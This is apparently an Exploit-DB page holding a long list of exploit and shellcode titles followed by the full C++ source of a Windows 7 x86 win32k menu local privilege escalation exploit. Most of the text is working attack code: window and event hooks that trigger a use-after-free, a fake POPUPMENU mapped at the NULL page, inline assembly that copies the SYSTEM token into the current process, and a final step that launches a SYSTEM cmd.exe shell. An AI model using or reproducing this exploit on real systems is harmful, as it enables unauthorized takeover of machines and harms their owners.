720fabd066
114 changes to exploits/shellcodes Notepad++ < 7.7 (x64) - Denial of Service winrar 5.80 64bit - Denial of Service WinRAR 5.80 (x64) - Denial of Service Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017) Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017) Microsoft Word 2007 (x86) - Information Disclosure IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass) MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass) Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path DEWESoft X3 SP1 (64-bit) - Remote Command Execution DEWESoft X3 SP1 (x64) - Remote Command Execution CompleteFTP Professional 12.1.3 - Remote Code Execution TeamCity Agent XML-RPC 10.0 - Remote Code Execution eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) Linux/x86 - Kill All Processes Shellcode (14 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) Linux/x86 - Bind Shell Generator Shellcode (114 bytes) Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) Linux/x86 - Bind Shell Generator Shellcode (114 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
377 lines
No EOL
10 KiB
C++
377 lines
No EOL
10 KiB
C++
#include <Windows.h>
|
|
#include <iostream>
|
|
|
|
/*
|
|
EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47176.zip
|
|
*/
|
|
|
|
/* PREPROCESSOR DEFINITIONS */
|
|
#define MN_SELECTITEM 0x1E5
|
|
#define MN_SELECTFIRSTVALIDITEM 0x1E7
|
|
#define MN_OPENHIERARCHY 0x01E3
|
|
#define MN_CANCELMENUS 0x1E6
|
|
#define MN_BUTTONDOWN 0x1ed
|
|
#define WM_EX_TRIGGER 0x6789
|
|
#define NtCurrentProcess() (HANDLE)-1
|
|
#define NtCurrentThread() (HANDLE)-1
|
|
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
|
|
#define TYPE_WINDOW 1
|
|
|
|
/* GLOBAL VARIABLES */
|
|
static BOOL hWindowHuntDestroy = FALSE;
|
|
static BOOL bEnterEvent = FALSE;
|
|
static BOOL success = FALSE;
|
|
static HMENU hMenuList[3] = { 0 };
|
|
static HWND hWindowMain = NULL;
|
|
static HWND hWindowHunt = NULL;
|
|
static HWND hwndMenuList[3] = { 0 };
|
|
static PVOID MemAddr = (PVOID)1;
|
|
static SIZE_T MemSize = 0x1000;
|
|
static DWORD iCount = 0;
|
|
static DWORD release = 0;
|
|
|
|
|
|
/* Structure definition of win32k!tagWND returned by xxHMValidateHandle */
|
|
typedef struct _HEAD {
|
|
HANDLE h;
|
|
DWORD cLockObj;
|
|
} HEAD, *PHEAD;
|
|
|
|
typedef struct _THROBJHEAD {
|
|
HEAD head;
|
|
PVOID pti;
|
|
} THROBJHEAD, *PTHROBJHEAD;
|
|
|
|
typedef struct _DESKHEAD {
|
|
PVOID rpdesk;
|
|
PBYTE pSelf;
|
|
} DESKHEAD, *PDESKHEAD;
|
|
|
|
typedef struct _THRDESKHEAD {
|
|
THROBJHEAD thread;
|
|
DESKHEAD deskhead;
|
|
} THRDESKHEAD, *PTHRDESKHEAD;
|
|
|
|
/* Definition of xxHMValidateHandle */
|
|
static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;
|
|
|
|
/* Defintion of NtallocateVirtualMemory */
|
|
typedef
|
|
NTSTATUS
|
|
(WINAPI *pfNtAllocateVirtualMemory) (
|
|
HANDLE ProcessHandle,
|
|
PVOID *BaseAddress,
|
|
ULONG_PTR ZeroBits,
|
|
PSIZE_T RegionSize,
|
|
ULONG AllocationType,
|
|
ULONG Protect
|
|
);
|
|
pfNtAllocateVirtualMemory NtAllocateVirtualMemory = NULL;
|
|
|
|
|
|
static
|
|
VOID
|
|
xxGetHMValidateHandle(VOID)
|
|
{
|
|
HMODULE hModule = LoadLibraryA("USER32.DLL");
|
|
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
|
|
PBYTE Address = NULL;
|
|
for (INT i = 0; i < 0x30; i++)
|
|
{
|
|
if (*(WORD *)(i + pfnIsMenu) != 0x02B2)
|
|
{
|
|
continue;
|
|
}
|
|
i += 2;
|
|
if (*(BYTE *)(i + pfnIsMenu) != 0xE8)
|
|
{
|
|
continue;
|
|
}
|
|
Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;
|
|
Address = Address + i + 5;
|
|
pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;
|
|
break;
|
|
}
|
|
}
|
|
|
|
static
|
|
PVOID
|
|
xxHMValidateHandleEx(HWND hwnd)
|
|
{
|
|
return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);
|
|
}
|
|
|
|
static
|
|
PVOID
|
|
xxHMValidateHandle(HWND hwnd)
|
|
{
|
|
PVOID RetAddr = NULL;
|
|
if (!pfnHMValidateHandle)
|
|
{
|
|
xxGetHMValidateHandle();
|
|
}
|
|
if (pfnHMValidateHandle)
|
|
{
|
|
RetAddr = xxHMValidateHandleEx(hwnd);
|
|
}
|
|
return RetAddr;
|
|
}
|
|
|
|
static
|
|
BOOL
|
|
xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra, WNDPROC pfnProc = DefWindowProcW)
|
|
{
|
|
WNDCLASSEXW wc = { 0 };
|
|
wc.cbSize = sizeof(WNDCLASSEXW);
|
|
wc.lpfnWndProc = pfnProc;
|
|
wc.cbWndExtra = cbWndExtra;
|
|
wc.hInstance = GetModuleHandleA(NULL);
|
|
wc.lpszMenuName = NULL;
|
|
wc.lpszClassName = lpszClassName;
|
|
return RegisterClassExW(&wc);
|
|
}
|
|
|
|
static
|
|
HWND
|
|
xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle, HINSTANCE hInstance = NULL, HWND hwndParent = NULL)
|
|
{
|
|
return CreateWindowExW(dwExStyle,
|
|
lpszClassName,
|
|
NULL,
|
|
dwStyle,
|
|
0,
|
|
0,
|
|
1,
|
|
1,
|
|
hwndParent,
|
|
NULL,
|
|
hInstance,
|
|
NULL);
|
|
}
|
|
|
|
static
|
|
LRESULT
|
|
CALLBACK
|
|
xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
|
|
{
|
|
tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
|
|
|
|
if (cwp->message == WM_NCCREATE && bEnterEvent && hwndMenuList[release] && !hwndMenuList[release+1])
|
|
{
|
|
printf("Sending the MN_CANCELMENUS message\n");
|
|
SendMessage(hwndMenuList[release], MN_CANCELMENUS, 0, 0);
|
|
bEnterEvent = FALSE;
|
|
}
|
|
return CallNextHookEx(0, code, wParam, lParam);
|
|
}
|
|
|
|
|
|
static
|
|
VOID
|
|
CALLBACK
|
|
xxWindowEventProc(
|
|
HWINEVENTHOOK hWinEventHook,
|
|
DWORD event,
|
|
HWND hwnd,
|
|
LONG idObject,
|
|
LONG idChild,
|
|
DWORD idEventThread,
|
|
DWORD dwmsEventTime
|
|
)
|
|
{
|
|
UNREFERENCED_PARAMETER(hWinEventHook);
|
|
UNREFERENCED_PARAMETER(event);
|
|
UNREFERENCED_PARAMETER(idObject);
|
|
UNREFERENCED_PARAMETER(idChild);
|
|
UNREFERENCED_PARAMETER(idEventThread);
|
|
UNREFERENCED_PARAMETER(dwmsEventTime);
|
|
|
|
bEnterEvent = TRUE;
|
|
if (iCount < ARRAYSIZE(hwndMenuList))
|
|
{
|
|
hwndMenuList[iCount] = hwnd;
|
|
iCount++;
|
|
}
|
|
SendMessageW(hwnd, MN_SELECTITEM, 0, 0);
|
|
SendMessageW(hwnd, MN_SELECTFIRSTVALIDITEM, 0, 0);
|
|
PostMessageW(hwnd, MN_OPENHIERARCHY, 0, 0);
|
|
}
|
|
|
|
__declspec(noinline) int Shellcode()
|
|
{
|
|
__asm {
|
|
xor eax, eax // Set EAX to 0.
|
|
mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData.
|
|
// _KTHREAD is located at FS:[0x124]
|
|
mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process
|
|
mov ecx, eax // Copy current process _EPROCESS structure
|
|
mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4
|
|
SearchSystemPID:
|
|
mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink
|
|
sub eax, 0B8h
|
|
cmp[eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId
|
|
jne SearchSystemPID
|
|
mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token
|
|
mov[ecx + 0xF8], edx // Assign SYSTEM process token.
|
|
}
|
|
}
|
|
|
|
static
|
|
LRESULT
|
|
WINAPI
|
|
xxMainWindowProc(
|
|
_In_ HWND hwnd,
|
|
_In_ UINT msg,
|
|
_In_ WPARAM wParam,
|
|
_In_ LPARAM lParam
|
|
)
|
|
{
|
|
if (msg == 0x1234)
|
|
{
|
|
WORD um = 0;
|
|
__asm
|
|
{
|
|
// Grab the value of the CS register and
|
|
// save it into the variable UM.
|
|
//int 3
|
|
mov ax, cs
|
|
mov um, ax
|
|
}
|
|
// If UM is 0x1B, this function is executing in usermode
|
|
// code and something went wrong. Therefore output a message that
|
|
// the exploit didn't succeed and bail.
|
|
if (um == 0x1b)
|
|
{
|
|
// USER MODE
|
|
printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
|
|
ExitProcess(-1); // Bail as if this code is hit either the target isn't
|
|
// vulnerable or something is wrong with the exploit.
|
|
}
|
|
else
|
|
{
|
|
success = TRUE; // Set the success flag to indicate the sprayCallback()
|
|
// window procedure is running as SYSTEM.
|
|
Shellcode(); // Call the Shellcode() function to perform the token stealing and
|
|
// to remove the Job object on the Chrome renderer process.
|
|
}
|
|
}
|
|
return DefWindowProcW(hwnd, msg, wParam, lParam);
|
|
}
|
|
|
|
int main()
|
|
{
|
|
/* Creating the menu */
|
|
for (int i = 0; i < 3; i++)
|
|
hMenuList[i] = CreateMenu();
|
|
|
|
/* Appending the menus along with the item */
|
|
for (int i = 0; i < 3; i++)
|
|
{
|
|
AppendMenuA(hMenuList[i], MF_POPUP | MF_MOUSESELECT, (UINT_PTR)hMenuList[i + 1], "item");
|
|
}
|
|
AppendMenuA(hMenuList[2], MF_POPUP | MF_MOUSESELECT, (UINT_PTR)0, "item");
|
|
|
|
/* Creating a main window class */
|
|
xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000, DefWindowProc);
|
|
hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN",
|
|
WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,
|
|
WS_VISIBLE,
|
|
GetModuleHandleA(NULL));
|
|
printf("Handle of the mainWindow : 0x%08X\n", (unsigned int)hWindowMain);
|
|
ShowWindow(hWindowMain, SW_SHOWNOACTIVATE);
|
|
|
|
/* Creating the hunt window class */
|
|
xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x000, xxMainWindowProc);
|
|
hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT",
|
|
WS_EX_LEFT,
|
|
WS_OVERLAPPEDWINDOW,
|
|
GetModuleHandleA(NULL));
|
|
printf("Handle of the huntWindow : 0x%08X\n", (unsigned int)hWindowHunt);
|
|
|
|
/* Hooking the WH_CALLWNDPROC function */
|
|
SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
|
|
|
|
/* Hooking the trackpopupmenuEx WINAPI call */
|
|
HWINEVENTHOOK hEventHook = SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, GetModuleHandleA(NULL), xxWindowEventProc,
|
|
GetCurrentProcessId(), GetCurrentThreadId(), 0);
|
|
|
|
/* Setting the root popup menu to null */
|
|
printf("Setting the root popup menu to null\n");
|
|
release = 0;
|
|
TrackPopupMenuEx(hMenuList[0], 0, 0, 0, hWindowMain, NULL);
|
|
|
|
/* Allocating the memory at NULL page */
|
|
*(FARPROC *)&NtAllocateVirtualMemory = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtAllocateVirtualMemory");
|
|
if (NtAllocateVirtualMemory == NULL)
|
|
return 1;
|
|
|
|
if (!NT_SUCCESS(NtAllocateVirtualMemory(NtCurrentProcess(),
|
|
&MemAddr,
|
|
0,
|
|
&MemSize,
|
|
MEM_COMMIT | MEM_RESERVE,
|
|
PAGE_READWRITE)) || MemAddr != NULL)
|
|
{
|
|
std::cout << "[-]Memory alloc failed!" << std::endl;
|
|
return 1;
|
|
}
|
|
ZeroMemory(MemAddr, MemSize);
|
|
|
|
/* Getting the tagWND of the hWindowHunt */
|
|
PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);
|
|
printf("Address of the win32k!tagWND of hWindowHunt : 0x%08X\n", (unsigned int)head->deskhead.pSelf);
|
|
|
|
/* Creating a fake POPUPMENU structure */
|
|
DWORD dwPopupFake[0x100] = { 0 };
|
|
dwPopupFake[0x0] = (DWORD)0x1; //->flags
|
|
dwPopupFake[0x1] = (DWORD)0x1; //->spwndNotify
|
|
dwPopupFake[0x2] = (DWORD)0x1; //->spwndPopupMenu
|
|
dwPopupFake[0x3] = (DWORD)0x1; //->spwndNextPopup
|
|
dwPopupFake[0x4] = (DWORD)0x1; //->spwndPrevPopup
|
|
dwPopupFake[0x5] = (DWORD)0x1; //->spmenu
|
|
dwPopupFake[0x6] = (DWORD)0x1; //->spmenuAlternate
|
|
dwPopupFake[0x7] = (ULONG)head->deskhead.pSelf + 0x12; //->spwndActivePopup
|
|
dwPopupFake[0x8] = (DWORD)0x1; //->ppopupmenuRoot
|
|
dwPopupFake[0x9] = (DWORD)0x1; //->ppmDelayedFree
|
|
dwPopupFake[0xA] = (DWORD)0x1; //->posSelectedItem
|
|
dwPopupFake[0xB] = (DWORD)0x1; //->posDropped
|
|
dwPopupFake[0xC] = (DWORD)0;
|
|
|
|
/* Copying it to the NULL page */
|
|
RtlCopyMemory(MemAddr, dwPopupFake, 0x1000);
|
|
|
|
/* Allowing to access the NULL page mapped values */
|
|
release = 1;
|
|
hwndMenuList[2] = NULL;
|
|
TrackPopupMenuEx(hMenuList[1], 0, 0, 0, hWindowMain, NULL);
|
|
|
|
/* Freeing the allocated NULL memory */
|
|
VirtualFree(MemAddr, 0x1000, 0);
|
|
|
|
SendMessageW(hWindowHunt, 0x1234, (WPARAM)hwndMenuList[0], 0x11);
|
|
|
|
if (success)
|
|
{
|
|
STARTUPINFO si = { sizeof(si) };
|
|
PROCESS_INFORMATION pi = { 0 };
|
|
si.dwFlags = STARTF_USESHOWWINDOW;
|
|
si.wShowWindow = SW_SHOW;
|
|
printf("Getting the shell now...\n");
|
|
BOOL bRet = CreateProcessA(NULL, (LPSTR)"cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
|
|
if (bRet)
|
|
{
|
|
CloseHandle(pi.hProcess);
|
|
CloseHandle(pi.hThread);
|
|
}
|
|
}
|
|
|
|
DestroyWindow(hWindowMain);
|
|
|
|
MSG msg = { 0 };
|
|
while (GetMessageW(&msg, NULL, 0, 0))
|
|
{
|
|
TranslateMessage(&msg);
|
|
DispatchMessageW(&msg);
|
|
}
|
|
return 0;
|
|
} |